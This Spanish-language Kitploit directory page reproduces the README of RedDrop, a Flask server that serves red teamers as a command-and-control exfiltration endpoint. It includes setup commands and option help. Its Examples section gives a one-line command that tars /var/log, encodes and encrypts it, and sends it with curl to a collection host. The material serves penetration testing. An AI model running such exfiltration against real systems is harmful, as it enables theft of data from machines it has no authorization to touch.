Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RedDrop — Servidor web Python Flask para capturar, procesar y registrar payloads codificados/cifrados y archivos tar, diseñado para probadores de penetración y red teamers como un endpoint de exfiltración C2. | Kitploit
Herramientas/GitHubGitHub/cyberbutler/reddrop
Generación de PayloadsExfiltración de DatosSeguridad WebComando y ControlRed Teaming
GitHubcyberbutler/reddrop

RedDrop

Servidor web Python Flask para capturar, procesar y registrar payloads codificados/cifrados y archivos tar, diseñado para probadores de penetración y red teamers como un endpoint de exfiltración C2.

Ver Repositorio
5861hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Red Drop

RedDrop Exfil Server

¡Mira el artículo del blog de MaverisLabs que lo acompaña aquí!

RedDrop Exfil Server es un servidor web Python Flask para probadores de penetración, equipos rojos y profesionales de seguridad que incluye:

  • Carga de archivos
  • Procesamiento automático de payloads
  • Extracción automática de archivos
  • Registro JSON
  • Opciones configurables
  • Reglas de autorización

Este software está diseñado para ser utilizado como un endpoint C2 rudimentario para capturar datos de solicitudes web en varios escenarios. Algunos ejemplos pueden incluir:

  • Una vulnerabilidad de inyección de comandos ciega
  • Un ataque XSS donde se necesita un servidor de registro de solicitudes web rápido y dinámico
  • Una situación en la que se ha obtenido acceso remoto a un shell y se desea un servidor de exfiltración basado en web con registro detallado

Demo

Demo

Este proyecto aún está en desarrollo y algunas características pueden tener errores. Si encuentras problemas, ¡por favor abre un Issue!

Una nota sobre seguridad

Este software no debe dejarse generalmente accesible a Internet. Está construido con lo que algunos podrían considerar una vulnerabilidad de carga arbitraria de archivos intencional, y aceptará y guardará archivos en el disco local sin autenticación. Se debe tener la debida diligencia para asegurar que el sistema donde se despliega este software esté protegido adecuadamente. Algunas recomendaciones:

  • Utilice la función de Reglas de Autorización de RedDrop para rechazar solicitudes que no cumplan con sus criterios.
  • Coloque un Proxy Inverso para enrutar y bloquear el tráfico a esta aplicación web
  • Blanquee el espacio IP de su objetivo
  • No extraiga archivos automáticamente sin entender mi método de filtrado

Quick Start

Docker

root@kitploit:~
mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

root@kitploit:~
pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

Options

root@kitploit:~
python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

Examples

Exfiltración de un archivo Tar y salida de comandos desde un sistema Linux

root@kitploit:~
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

Todo

  • Mayor documentación de técnicas que utilizan este servidor web
  • Manejo de carga de archivos fragmentados y comandos de ejemplo
  • Más módulos de procesamiento
  • Ampliar la funcionalidad de extracción de archivos
Descargar herramienta